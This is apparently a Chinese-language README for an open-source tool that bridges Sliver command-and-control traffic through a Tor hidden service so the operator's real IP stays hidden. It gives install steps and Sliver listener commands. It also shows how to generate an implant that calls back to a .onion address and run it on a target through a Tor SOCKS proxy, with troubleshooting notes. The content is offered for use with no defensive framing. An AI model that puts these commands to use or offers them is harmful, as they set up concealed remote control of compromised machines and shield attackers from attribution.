基于 Tor 的传输桥接,用于 Sliver C2。创建一个隐藏服务,并将流量代理到您的 Sliver 服务器,从而保证真实 IP 永不暴露。
设置一个指向本地 HTTP 代理的 Tor 隐藏服务。该代理将所有流量转发到 Sliver 的 HTTPS 监听器。植入体通过 Tor 连接,您通过 Sliver 正常控制它们。
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
启动 Sliver 并开启一个 HTTPS 监听器:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
在另一个终端中,启动桥接:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
输出结果将类似:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
等待 .onion 地址出现,然后生成植入体:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
在目标上运行植入体(需要 Tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port Sliver HTTPS 端口(默认 8443)
--tor-port Tor SOCKS 端口(默认 9050)
--service-port 隐藏服务端口(默认 80)
-c, --config 配置文件路径
其他命令:
sliver-tor-bridge status # 检查隐藏服务是否正在运行
sliver-tor-bridge stop # 清理隐藏服务目录
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]桥接位于中间并中继流量。Sliver 认为它收到的是正常的 HTTPS 连接。植入体认为它正在与一个正常的 HTTP 服务器通信。
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # 命令行界面
tor_manager.py # 启动 Tor 并创建隐藏服务
proxy.py # 转发到 Sliver 的 Flask 应用
config.py # 配置处理
Tor 无法启动:确保系统 Tor 已停止(sudo systemctl stop tor)
连接超时:Tor 引导过程可能需要 1-3 分钟,请等待 100%
植入体无法连接:确保植入体可以访问 Tor(SOCKS 代理在 9050 端口)
MIT